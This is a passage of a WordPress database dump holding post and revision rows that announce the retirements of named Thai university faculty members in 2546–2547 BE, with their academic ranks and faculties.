(203, 1, '2019-05-26 15:02:15', '2019-05-26 08:02:15', 'อาจารย์จุนีย์ ลิ่มสุวรรณ์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'อาจารย์จุนีย์ ลิ่มสุวรรณ์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%88%e0%b8%b8%e0%b8%99%e0%b8%b5%e0%b8%a2%e0%b9%8c-%e0%b8%a5%e0%b8%b4%e0%b9%88%e0%b8%a1%e0%b8%aa%e0%b8%b8%e0%b8%a7%e0%b8%a3%e0%b8%a3', '', '', '2019-05-26 15:02:15', '2019-05-26 08:02:15', '', 0, 'http://172.17.40.11/wp511/?p=203', 0, 'post', '', 0),
(204, 1, '2019-05-26 15:02:15', '2019-05-26 08:02:15', 'อาจารย์จุนีย์ ลิ่มสุวรรณ์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'อาจารย์จุนีย์ ลิ่มสุวรรณ์', '', 'inherit', 'closed', 'closed', '', '203-revision-v1', '', '', '2019-05-26 15:02:15', '2019-05-26 08:02:15', '', 203, 'http://172.17.40.11/wp511/?p=204', 0, 'revision', '', 0),
(205, 1, '2019-05-26 15:02:30', '2019-05-26 08:02:30', 'ผู้ช่วยศาสตราจารย์ไชยยุทธ ชีวยะ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์ไชยยุทธ ชีวยะ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%84%e0%b8%8a%e0%b8%a2%e0%b8%a2', '', '', '2019-05-26 15:02:30', '2019-05-26 08:02:30', '', 0, 'http://172.17.40.11/wp511/?p=205', 0, 'post', '', 0),
(206, 1, '2019-05-26 15:02:30', '2019-05-26 08:02:30', 'ผู้ช่วยศาสตราจารย์ไชยยุทธ ชีวยะ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์ไชยยุทธ ชีวยะ', '', 'inherit', 'closed', 'closed', '', '205-revision-v1', '', '', '2019-05-26 15:02:30', '2019-05-26 08:02:30', '', 205, 'http://172.17.40.11/wp511/?p=206', 0, 'revision', '', 0),
(207, 1, '2019-05-26 15:02:43', '2019-05-26 08:02:43', 'ผู้ช่วยศาสตราจารย์นิคม นิลรัตน์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์นิคม นิลรัตน์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a1', '', '', '2019-05-26 15:02:43', '2019-05-26 08:02:43', '', 0, 'http://172.17.40.11/wp511/?p=207', 0, 'post', '', 0),
(208, 1, '2019-05-26 15:02:43', '2019-05-26 08:02:43', 'ผู้ช่วยศาสตราจารย์นิคม นิลรัตน์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์นิคม นิลรัตน์', '', 'inherit', 'closed', 'closed', '', '207-revision-v1', '', '', '2019-05-26 15:02:43', '2019-05-26 08:02:43', '', 207, 'http://172.17.40.11/wp511/?p=208', 0, 'revision', '', 0),
(209, 1, '2019-05-26 15:02:57', '2019-05-26 08:02:57', 'ผู้ช่วยศาสตราจารย์ประโรต  ไทยเครือวัลย์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์ประโรต  ไทยเครือวัลย์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%82', '', '', '2019-05-26 15:02:57', '2019-05-26 08:02:57', '', 0, 'http://172.17.40.11/wp511/?p=209', 0, 'post', '', 0),
(210, 1, '2019-05-26 15:02:57', '2019-05-26 08:02:57', 'ผู้ช่วยศาสตราจารย์ประโรต  ไทยเครือวัลย์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์ประโรต  ไทยเครือวัลย์', '', 'inherit', 'closed', 'closed', '', '209-revision-v1', '', '', '2019-05-26 15:02:57', '2019-05-26 08:02:57', '', 209, 'http://172.17.40.11/wp511/?p=210', 0, 'revision', '', 0),
(211, 1, '2019-05-26 15:03:09', '2019-05-26 08:03:09', 'อาจารย์มนูญ  พงศ์มณี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'อาจารย์มนูญ  พงศ์มณี', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a1%e0%b8%99%e0%b8%b9%e0%b8%8d-%e0%b8%9e%e0%b8%87%e0%b8%a8%e0%b9%8c%e0%b8%a1%e0%b8%93%e0%b8%b5', '', '', '2019-05-26 15:03:09', '2019-05-26 08:03:09', '', 0, 'http://172.17.40.11/wp511/?p=211', 0, 'post', '', 0),
(212, 1, '2019-05-26 15:03:09', '2019-05-26 08:03:09', 'อาจารย์มนูญ  พงศ์มณี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'อาจารย์มนูญ  พงศ์มณี', '', 'inherit', 'closed', 'closed', '', '211-revision-v1', '', '', '2019-05-26 15:03:09', '2019-05-26 08:03:09', '', 211, 'http://172.17.40.11/wp511/?p=212', 0, 'revision', '', 0),
(213, 1, '2019-05-26 15:03:25', '2019-05-26 08:03:25', 'ผู้ช่วยศาสตราจารย์ลัดดา เหมทานนท์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์ลัดดา เหมทานนท์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a5%e0%b8%b1%e0%b8%94%e0%b8%94', '', '', '2019-05-26 15:03:25', '2019-05-26 08:03:25', '', 0, 'http://172.17.40.11/wp511/?p=213', 0, 'post', '', 0),
(214, 1, '2019-05-26 15:03:25', '2019-05-26 08:03:25', 'ผู้ช่วยศาสตราจารย์ลัดดา เหมทานนท์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์ลัดดา เหมทานนท์', '', 'inherit', 'closed', 'closed', '', '213-revision-v1', '', '', '2019-05-26 15:03:25', '2019-05-26 08:03:25', '', 213, 'http://172.17.40.11/wp511/?p=214', 0, 'revision', '', 0),
(215, 1, '2019-05-26 15:03:37', '2019-05-26 08:03:37', 'ผู้ช่วยศาสตราจารย์วงศ์ชัย ภูมิระวิ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์วงศ์ชัย ภูมิระวิ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%87%e0%b8%a8%e0%b9%8c', '', '', '2019-05-26 15:03:37', '2019-05-26 08:03:37', '', 0, 'http://172.17.40.11/wp511/?p=215', 0, 'post', '', 0),
(216, 1, '2019-05-26 15:03:37', '2019-05-26 08:03:37', 'ผู้ช่วยศาสตราจารย์วงศ์ชัย ภูมิระวิ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์วงศ์ชัย ภูมิระวิ', '', 'inherit', 'closed', 'closed', '', '215-revision-v1', '', '', '2019-05-26 15:03:37', '2019-05-26 08:03:37', '', 215, 'http://172.17.40.11/wp511/?p=216', 0, 'revision', '', 0),
(217, 1, '2019-05-26 15:03:49', '2019-05-26 08:03:49', 'ผู้ช่วยศาสตราจารย์วันดี หนูสงค์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์วันดี หนูสงค์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%94', '', '', '2019-05-26 15:03:49', '2019-05-26 08:03:49', '', 0, 'http://172.17.40.11/wp511/?p=217', 0, 'post', '', 0),
(218, 1, '2019-05-26 15:03:49', '2019-05-26 08:03:49', 'ผู้ช่วยศาสตราจารย์วันดี หนูสงค์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์วันดี หนูสงค์', '', 'inherit', 'closed', 'closed', '', '217-revision-v1', '', '', '2019-05-26 15:03:49', '2019-05-26 08:03:49', '', 217, 'http://172.17.40.11/wp511/?p=218', 0, 'revision', '', 0),
(219, 1, '2019-05-26 15:04:01', '2019-05-26 08:04:01', 'ผู้ช่วยศาสตราจารย์วิบูลย์ จิตรักษธรรม\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์วิบูลย์ จิตรักษธรรม', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%b4%e0%b8%9a%e0%b8%b9', '', '', '2019-05-26 15:04:01', '2019-05-26 08:04:01', '', 0, 'http://172.17.40.11/wp511/?p=219', 0, 'post', '', 0),
(220, 1, '2019-05-26 15:04:01', '2019-05-26 08:04:01', 'ผู้ช่วยศาสตราจารย์วิบูลย์ จิตรักษธรรม\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์วิบูลย์ จิตรักษธรรม', '', 'inherit', 'closed', 'closed', '', '219-revision-v1', '', '', '2019-05-26 15:04:01', '2019-05-26 08:04:01', '', 219, 'http://172.17.40.11/wp511/?p=220', 0, 'revision', '', 0),
(221, 1, '2019-05-26 15:04:14', '2019-05-26 08:04:14', 'ผู้ช่วยศาสตราจารย์สมบูรณ์ คุปตภากร\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์สมบูรณ์ คุปตภากร', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%a1%e0%b8%9a%e0%b8%b9', '', '', '2019-05-26 15:04:14', '2019-05-26 08:04:14', '', 0, 'http://172.17.40.11/wp511/?p=221', 0, 'post', '', 0),
(222, 1, '2019-05-26 15:04:14', '2019-05-26 08:04:14', 'ผู้ช่วยศาสตราจารย์สมบูรณ์ คุปตภากร\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์สมบูรณ์ คุปตภากร', '', 'inherit', 'closed', 'closed', '', '221-revision-v1', '', '', '2019-05-26 15:04:14', '2019-05-26 08:04:14', '', 221, 'http://172.17.40.11/wp511/?p=222', 0, 'revision', '', 0),
(223, 1, '2019-05-26 15:04:30', '2019-05-26 08:04:30', 'ผู้ช่วยศาสตราจารย์สามารถ คงสะอาด\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์สามารถ คงสะอาด', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b2%e0%b8%a1%e0%b8%b2', '', '', '2019-05-26 15:04:30', '2019-05-26 08:04:30', '', 0, 'http://172.17.40.11/wp511/?p=223', 0, 'post', '', 0),
(224, 1, '2019-05-26 15:04:30', '2019-05-26 08:04:30', 'ผู้ช่วยศาสตราจารย์สามารถ คงสะอาด\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์สามารถ คงสะอาด', '', 'inherit', 'closed', 'closed', '', '223-revision-v1', '', '', '2019-05-26 15:04:30', '2019-05-26 08:04:30', '', 223, 'http://172.17.40.11/wp511/?p=224', 0, 'revision', '', 0),
(225, 1, '2019-05-26 15:04:42', '2019-05-26 08:04:42', 'อาจารย์สุธีรา เผือกผ่อง\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'อาจารย์สุธีรา เผือกผ่อง', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%98%e0%b8%b5%e0%b8%a3%e0%b8%b2-%e0%b9%80%e0%b8%9c%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%9c%e0%b9%88%e0%b8%ad%e0%b8%87', '', '', '2019-05-26 15:04:42', '2019-05-26 08:04:42', '', 0, 'http://172.17.40.11/wp511/?p=225', 0, 'post', '', 0),
(226, 1, '2019-05-26 15:04:42', '2019-05-26 08:04:42', 'อาจารย์สุธีรา เผือกผ่อง\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'อาจารย์สุธีรา เผือกผ่อง', '', 'inherit', 'closed', 'closed', '', '225-revision-v1', '', '', '2019-05-26 15:04:42', '2019-05-26 08:04:42', '', 225, 'http://172.17.40.11/wp511/?p=226', 0, 'revision', '', 0),
(227, 1, '2019-05-26 15:04:54', '2019-05-26 08:04:54', 'ผู้ช่วยศาสตราจารย์สุรพล ไพโรจน์ประยูร\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์สุรพล ไพโรจน์ประยูร', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%a3%e0%b8%9e', '', '', '2019-05-26 15:04:54', '2019-05-26 08:04:54', '', 0, 'http://172.17.40.11/wp511/?p=227', 0, 'post', '', 0),
(228, 1, '2019-05-26 15:04:54', '2019-05-26 08:04:54', 'ผู้ช่วยศาสตราจารย์สุรพล ไพโรจน์ประยูร\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์สุรพล ไพโรจน์ประยูร', '', 'inherit', 'closed', 'closed', '', '227-revision-v1', '', '', '2019-05-26 15:04:54', '2019-05-26 08:04:54', '', 227, 'http://172.17.40.11/wp511/?p=228', 0, 'revision', '', 0),
(229, 1, '2019-05-26 15:05:07', '2019-05-26 08:05:07', 'ผู้ช่วยศาสตราจารย์สุรภีร์  วีรวานิช\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์สุรภีร์  วีรวานิช', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%a3%e0%b8%a0', '', '', '2019-05-26 15:05:07', '2019-05-26 08:05:07', '', 0, 'http://172.17.40.11/wp511/?p=229', 0, 'post', '', 0),
(230, 1, '2019-05-26 15:05:07', '2019-05-26 08:05:07', 'ผู้ช่วยศาสตราจารย์สุรภีร์  วีรวานิช\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์สุรภีร์  วีรวานิช', '', 'inherit', 'closed', 'closed', '', '229-revision-v1', '', '', '2019-05-26 15:05:07', '2019-05-26 08:05:07', '', 229, 'http://172.17.40.11/wp511/?p=230', 0, 'revision', '', 0),
(231, 1, '2019-05-26 15:05:23', '2019-05-26 08:05:23', 'ผู้ช่วยศาสตราจารย์อรุณี กาญจนสุวรรณ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์อรุณี กาญจนสุวรรณ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%ad%e0%b8%a3%e0%b8%b8%e0%b8%93-2', '', '', '2019-05-26 15:05:23', '2019-05-26 08:05:23', '', 0, 'http://172.17.40.11/wp511/?p=231', 0, 'post', '', 0),
(232, 1, '2019-05-26 15:05:23', '2019-05-26 08:05:23', 'ผู้ช่วยศาสตราจารย์อรุณี กาญจนสุวรรณ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2546', 'ผู้ช่วยศาสตราจารย์อรุณี กาญจนสุวรรณ', '', 'inherit', 'closed', 'closed', '', '231-revision-v1', '', '', '2019-05-26 15:05:23', '2019-05-26 08:05:23', '', 231, 'http://172.17.40.11/wp511/?p=232', 0, 'revision', '', 0),
(233, 1, '2019-05-26 15:05:35', '2019-05-26 08:05:35', 'ผู้ช่วยศาสตราจารย์ชูจิตต์  เครือตราชู เกียรติ์อนันต์ชัย\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2547', 'ผู้ช่วยศาสตราจารย์ชูจิตต์  เครือตราชู เกียรติ์อนันต์ชัย', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%8a%e0%b8%b9%e0%b8%88%e0%b8%b4', '', '', '2019-05-26 15:05:35', '2019-05-26 08:05:35', '', 0, 'http://172.17.40.11/wp511/?p=233', 0, 'post', '', 0),
(234, 1, '2019-05-26 15:05:35', '2019-05-26 08:05:35', 'ผู้ช่วยศาสตราจารย์ชูจิตต์  เครือตราชู เกียรติ์อนันต์ชัย\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2547', 'ผู้ช่วยศาสตราจารย์ชูจิตต์  เครือตราชู เกียรติ์อนันต์ชัย', '', 'inherit', 'closed', 'closed', '', '233-revision-v1', '', '', '2019-05-26 15:05:35', '2019-05-26 08:05:35', '', 233, 'http://172.17.40.11/wp511/?p=234', 0, 'revision', '', 0),
(235, 1, '2019-05-26 15:05:46', '2019-05-26 08:05:46', 'รองศาสตราจารย์เถกิง พันธุ์เถกิงอมร\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'รองศาสตราจารย์เถกิง พันธุ์เถกิงอมร', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%96%e0%b8%81%e0%b8%b4%e0%b8%87-%e0%b8%9e%e0%b8%b1%e0%b8%99', '', '', '2019-05-26 15:05:46', '2019-05-26 08:05:46', '', 0, 'http://172.17.40.11/wp511/?p=235', 0, 'post', '', 0),
(236, 1, '2019-05-26 15:05:46', '2019-05-26 08:05:46', 'รองศาสตราจารย์เถกิง พันธุ์เถกิงอมร\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'รองศาสตราจารย์เถกิง พันธุ์เถกิงอมร', '', 'inherit', 'closed', 'closed', '', '235-revision-v1', '', '', '2019-05-26 15:05:46', '2019-05-26 08:05:46', '', 235, 'http://172.17.40.11/wp511/?p=236', 0, 'revision', '', 0),
(237, 1, '2019-05-26 15:05:59', '2019-05-26 08:05:59', 'ผู้ช่วยศาสตราจารย์ประทิน ศิริรัตนากร\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์ประทิน ศิริรัตนากร', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%97', '', '', '2019-05-26 15:05:59', '2019-05-26 08:05:59', '', 0, 'http://172.17.40.11/wp511/?p=237', 0, 'post', '', 0),
(238, 1, '2019-05-26 15:05:59', '2019-05-26 08:05:59', 'ผู้ช่วยศาสตราจารย์ประทิน ศิริรัตนากร\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์ประทิน ศิริรัตนากร', '', 'inherit', 'closed', 'closed', '', '237-revision-v1', '', '', '2019-05-26 15:05:59', '2019-05-26 08:05:59', '', 237, 'http://172.17.40.11/wp511/?p=238', 0, 'revision', '', 0),
(239, 1, '2019-05-26 15:06:15', '2019-05-26 08:06:15', 'ผู้ช่วยศาสตราจารย์ดร.ประยูร  เทพนวล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์ดร.ประยูร  เทพนวล', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%94%e0%b8%a3-%e0%b8%9b%e0%b8%a3', '', '', '2019-05-26 15:06:15', '2019-05-26 08:06:15', '', 0, 'http://172.17.40.11/wp511/?p=239', 0, 'post', '', 0),
(240, 1, '2019-05-26 15:06:15', '2019-05-26 08:06:15', 'ผู้ช่วยศาสตราจารย์ดร.ประยูร  เทพนวล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์ดร.ประยูร  เทพนวล', '', 'inherit', 'closed', 'closed', '', '239-revision-v1', '', '', '2019-05-26 15:06:15', '2019-05-26 08:06:15', '', 239, 'http://172.17.40.11/wp511/?p=240', 0, 'revision', '', 0),
(241, 1, '2019-05-26 15:06:28', '2019-05-26 08:06:28', 'ผู้ช่วยศาสตราจารย์พุทธชาติ ราชปรีชา\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์พุทธชาติ ราชปรีชา', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9e%e0%b8%b8%e0%b8%97%e0%b8%98', '', '', '2019-05-26 15:06:28', '2019-05-26 08:06:28', '', 0, 'http://172.17.40.11/wp511/?p=241', 0, 'post', '', 0),
(242, 1, '2019-05-26 15:06:28', '2019-05-26 08:06:28', 'ผู้ช่วยศาสตราจารย์พุทธชาติ ราชปรีชา\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์พุทธชาติ ราชปรีชา', '', 'inherit', 'closed', 'closed', '', '241-revision-v1', '', '', '2019-05-26 15:06:28', '2019-05-26 08:06:28', '', 241, 'http://172.17.40.11/wp511/?p=242', 0, 'revision', '', 0),
(243, 1, '2019-05-26 15:06:42', '2019-05-26 08:06:42', 'ผู้ช่วยศาสตราจารย์เพียร  ซ้ายขวัญ\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์เพียร  ซ้ายขวัญ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%9e%e0%b8%b5%e0%b8%a2', '', '', '2019-05-26 15:06:42', '2019-05-26 08:06:42', '', 0, 'http://172.17.40.11/wp511/?p=243', 0, 'post', '', 0),
(244, 1, '2019-05-26 15:06:42', '2019-05-26 08:06:42', 'ผู้ช่วยศาสตราจารย์เพียร  ซ้ายขวัญ\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์เพียร  ซ้ายขวัญ', '', 'inherit', 'closed', 'closed', '', '243-revision-v1', '', '', '2019-05-26 15:06:42', '2019-05-26 08:06:42', '', 243, 'http://172.17.40.11/wp511/?p=244', 0, 'revision', '', 0),
